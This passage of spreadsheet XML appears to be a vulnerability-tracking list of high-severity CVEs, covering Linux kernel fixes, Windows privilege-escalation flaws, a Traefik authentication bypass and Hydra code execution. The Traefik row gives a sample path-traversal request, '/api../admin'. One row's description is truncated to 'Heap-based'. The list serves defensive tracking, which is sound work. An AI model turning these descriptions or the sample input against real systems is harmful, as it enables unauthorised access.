          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J747" s="5" t="inlineStr"/>
      <c r="K747" s="5" t="inlineStr"/>
      <c r="L747" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
proc: protect ptrace_may_access() with exec_update_lock (FD links)
proc_pid_get_link() and proc_pid_readlink() currently look up the task from
the pid once, then do the ptrace access check on that task, then look up
the task from the pid a second time to do the actual access.
That's racy in several ways.
To fix it, pass the task to the -&gt;proc_get_link() handler, and instead of
proc_fd_access_allowed(), introduce a new helper call_proc_get_link() that
looks up and locks the task, does the access check, and calls
-&gt;proc_get_link().</t>
        </is>
      </c>
      <c r="M747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64375</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64377</t>
        </is>
      </c>
      <c r="C748" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D748" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E748" s="5" t="inlineStr"/>
      <c r="F748" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G748" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H748" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I748" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L748" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: qcom-cpufreq-hw: Fix possible double free
qcom_cpufreq.data is allocated with devm_kzalloc() in probe() as an
array of per-domain data. qcom_cpufreq_hw_cpu_init() stores a pointer to
one element of this array in policy-&gt;driver_data.
qcom_cpufreq_hw_cpu_exit() currently calls kfree() on policy-&gt;driver_data.
This is not valid because the memory is devm-managed. For the first
domain, this can free the devm-managed allocation while the devres entry
is still active, leading to a possible double free when the platform
device is later detached. For other domains, the pointer may refer to an
element inside the array rather than the allocation base.
Remove the kfree(data) call and let devres release qcom_cpufreq.data.
This issue was found by a static analysis tool I am developing.</t>
        </is>
      </c>
      <c r="M748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64377</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64378</t>
        </is>
      </c>
      <c r="C749" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D749" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E749" s="5" t="inlineStr"/>
      <c r="F749" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G749" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H749" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I749" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J749" s="5" t="inlineStr"/>
      <c r="K749" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L749" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
writeback: fix race between cgroup_writeback_umount() and inode_switch_wbs()
When a container exits, the following BUG_ON() is occasionally triggered:
==================================================================
 VFS: Busy inodes after unmount of sdb (ext4)
 ------------[ cut here ]------------
 kernel BUG at fs/super.c:695!
 CPU: 3 PID: 6 Comm: containerd-shim Tainted: G OE K 6.6 #1
 pstate: 63400009 (nZCv daif +PAN -UAO +TCO +DIT -SSBS BTYPE=--)
 pc : generic_shutdown_super+0xf0/0x100
 lr : generic_shutdown_super+0xf0/0x100
 Call trace:
  generic_shutdown_super+0xf0/0x100
  kill_block_super+0x20/0x48
  ext4_kill_sb+0x28/0x60
  deactivate_locked_super+0x54/0x130
  deactivate_super+0x84/0xa0
  cleanup_mnt+0xa4/0x140
  __cleanup_mnt+0x18/0x28
  task_work_run+0x78/0xe0
  do_notify_resume+0x204/0x240
==================================================================
The root cause is a race between cgroup_writeback_umount() and
inode_switch_wbs()/cleanup_offline_cgwb(). There is a window between
inode_prepare_wbs_switch() returning true and the subsequent
wb_queue_isw() call. Following is the process that triggers the issue:
      CPU A (umount)           |          CPU B (writeback)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                 inode_switch_wbs/cleanup_offline_cgwb
                                  atomic_inc(&amp;isw_nr_in_flight)
                                  inode_prepare_wbs_switch
                                   -&gt; passes SB_ACTIVE check
                                   __iget(inode)
 generic_shutdown_super
  sb-&gt;s_flags &amp;= ~SB_ACTIVE
  cgroup_writeback_umount(sb)
   smp_mb()
   atomic_read(&amp;isw_nr_in_flight)
   rcu_barrier()
    -&gt; no pending RCU callbacks
   flush_workqueue(isw_wq)
    -&gt; nothing queued, returns
  evict_inodes(sb)
   -&gt; Inode skipped as isw still holds a ref.
  sop-&gt;put_super(sb)
   /* destroys percpu counters */
  -&gt; VFS: Busy inodes after unmount!
                                  wb_queue_isw()
                                   queue_work(isw_wq, ...)
                                  /* later in work function */
                                  inode_switch_wbs_work_fn
                                   process_inode_switch_wbs
                                    iput() -&gt; evict
                                     percpu_counter_dec() // UAF!
Fix this by extending the RCU read-side critical section in
inode_switch_wbs() and cleanup_offline_cgwb() to cover from
inode_prepare_wbs_switch() through wb_queue_isw().  Since there is
no sleep in this window, rcu_read_lock() can be used.  Then add a
synchronize_rcu() in cgroup_writeback_umount() before the existing
rcu_barrier(), so that all in-flight switchers that have passed the
SB_ACTIVE check have completed queue_work() before flush_workqueue()
is called.
The existing rcu_barrier() is intentionally retained so this fix can
be backported unchanged to stable kernels (5.10.y, 6.6.y, ...) that
still queue switches via queue_rcu_work(). It is a no-op on current
mainline (since commit e1b849cfa6b6 ("writeback: Avoid contention on
wb-&gt;list_lock when switching inodes")) and is removed in a follow-up
patch.</t>
        </is>
      </c>
      <c r="M749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64378</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64381</t>
        </is>
      </c>
      <c r="C750" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D750" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E750" s="5" t="inlineStr"/>
      <c r="F750" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G750" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H750" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I750" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J750" s="5" t="inlineStr"/>
      <c r="K750" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L750" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smb: client: Fix next buffer leak in receive_encrypted_standard()
receive_encrypted_standard() allocates next_buffer before checking
whether the number of compound PDUs already reached MAX_COMPOUND. If
the limit check fails, the function returns immediately and the newly
allocated next_buffer is not assigned to server-&gt;smallbuf/server-&gt;bigbuf,
making it leaked.
Move the MAX_COMPOUND check before allocating next_buffer.</t>
        </is>
      </c>
      <c r="M750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64381</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67309</t>
        </is>
      </c>
      <c r="C751" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D751" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E751" s="5" t="inlineStr"/>
      <c r="F751" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G751" s="5" t="inlineStr">
        <is>
          <t>nginx, kubernetes</t>
        </is>
      </c>
      <c r="H751" s="5" t="inlineStr"/>
      <c r="I751" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L751" s="5" t="inlineStr">
        <is>
          <t>Traefik versions &gt;= v3.7.0 and &lt;= v3.7.7 contain a path traversal vulnerability in the Kubernetes Ingress NGINX provider's RewriteTarget middleware (generated from the nginx.ingress.kubernetes.io/rewrite-target annotation). When an Ingress path uses a regex that captures attacker-controlled text without requiring a path separator (e.g., path /api(.*) with rewrite target /$1), a crafted request such as /api../admin matches the public router, is rewritten to a dot-segment traversal path (/../admin), and is forwarded without post-replacement normalization validation. A backend that normalizes dot segments resolves the path to a protected endpoint (e.g., /admin) reachable only through a separate router secured with BasicAuth, DigestAuth, or ForwardAuth, resulting in route-level authentication bypass. The issue is fixed in v3.7.8.</t>
        </is>
      </c>
      <c r="M751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67309</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68508</t>
        </is>
      </c>
      <c r="C752" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D752" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E752" s="5" t="inlineStr"/>
      <c r="F752" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G752" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H752" s="5" t="inlineStr"/>
      <c r="I752" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J752" s="5" t="inlineStr"/>
      <c r="K752" s="5" t="inlineStr">
        <is>
          <t>CWE-470, CWE-94</t>
        </is>
      </c>
      <c r="L752" s="5" t="inlineStr">
        <is>
          <t>Hydra is a framework for elegantly configuring complex applications. Prior to 1.3.4, hydra.utils.instantiate() resolves and calls Python objects selected by configuration through _resolve_target() in hydra/_internal/instantiate/_instantiate2.py, allowing attacker-controlled target values and arguments to choose dangerous callables. A consuming application, library, CLI workflow, or model loader that passes untrusted configuration, CLI overrides, or model metadata into hydra.utils.instantiate() can therefore execute arbitrary code in its own process, including reading or modifying files and credentials or terminating the process. Version 1.3.4 adds target blocking with an explicit HYDRA_INSTANTIATE_ALLOWLIST_OVERRIDE escape hatch. This issue is fixed in version 1.3.4.</t>
        </is>
      </c>
      <c r="M752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68508</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68832</t>
        </is>
      </c>
      <c r="C753" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D753" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E753" s="5" t="inlineStr"/>
      <c r="F753" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G753" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H753" s="5" t="inlineStr"/>
      <c r="I753" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J753" s="5" t="inlineStr"/>
      <c r="K753" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L753" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68832</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68841</t>
        </is>
      </c>
      <c r="C754" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D754" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E754" s="5" t="inlineStr"/>
      <c r="F754" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G754" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H754" s="5" t="inlineStr"/>
      <c r="I754" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J754" s="5" t="inlineStr"/>
      <c r="K754" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L754" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68841</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68844</t>
        </is>
      </c>
      <c r="C755" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D755" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E755" s="5" t="inlineStr"/>
      <c r="F755" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G755" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H755" s="5" t="inlineStr"/>
      <c r="I755" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L755" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68844</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68845</t>
        </is>
      </c>
      <c r="C756" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D756" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E756" s="5" t="inlineStr"/>
      <c r="F756" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G756" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H756" s="5" t="inlineStr"/>
      <c r="I756" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L756" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68845</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68848</t>
        </is>
      </c>
      <c r="C757" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D757" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E757" s="5" t="inlineStr"/>
      <c r="F757" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G757" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H757" s="5" t="inlineStr"/>
      <c r="I757" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L757" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68848</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68850</t>
        </is>
      </c>
      <c r="C758" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D758" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E758" s="5" t="inlineStr"/>
      <c r="F758" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G758" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H758" s="5" t="inlineStr"/>
      <c r="I758" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L758" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Account allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68850</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68875</t>
        </is>
      </c>
      <c r="C759" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D759" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E759" s="5" t="inlineStr"/>
      <c r="F759" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G759" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H759" s="5" t="inlineStr"/>
      <c r="I759" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L759" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68875</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68877</t>
        </is>
      </c>
      <c r="C760" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D760" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E760" s="5" t="inlineStr"/>
      <c r="F760" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G760" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H760" s="5" t="inlineStr"/>
      <c r="I760" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L760" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Storage Spaces Controller allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68877</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68885</t>
        </is>
      </c>
      <c r="C761" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D761" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E761" s="5" t="inlineStr"/>
      <c r="F761" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G761" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H761" s="5" t="inlineStr"/>
      <c r="I761" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L761" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68885</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68888</t>
        </is>
      </c>
      <c r="C762" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D762" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E762" s="5" t="inlineStr"/>
      <c r="F762" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G762" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H762" s="5" t="inlineStr"/>
      <c r="I762" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L762" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68888</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68890</t>
        </is>
      </c>
      <c r="C763" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D763" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E763" s="5" t="inlineStr"/>
      <c r="F763" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G763" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H763" s="5" t="inlineStr"/>
      <c r="I763" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J763" s="5" t="inlineStr"/>
      <c r="K763" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L763" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68890</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68892</t>
        </is>
      </c>
      <c r="C764" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D764" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E764" s="5" t="inlineStr"/>
      <c r="F764" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G764" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H764" s="5" t="inlineStr"/>
      <c r="I764" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J764" s="5" t="inlineStr"/>
      <c r="K764" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L764" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68892</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68896</t>
        </is>
      </c>
      <c r="C765" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D765" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E765" s="5" t="inlineStr"/>
      <c r="F765" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G765" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H765" s="5" t="inlineStr"/>
      <c r="I765" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="L765" s="5" t="inlineStr">
        <is>
          <t>Absolute path traversal in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68896</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69265</t>
        </is>
      </c>
      <c r="C766" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D766" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E766" s="5" t="inlineStr"/>
      <c r="F766" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G766" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H766" s="5" t="inlineStr"/>
      <c r="I766" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L766" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69265</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69269</t>
        </is>
      </c>
      <c r="C767" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D767" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E767" s="5" t="inlineStr"/>
      <c r="F767" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G767" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H767" s="5" t="inlineStr"/>
      <c r="I767" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L767" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69269</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69270</t>
        </is>
      </c>
      <c r="C768" s="5" t="n">
        <v>7.8</v>
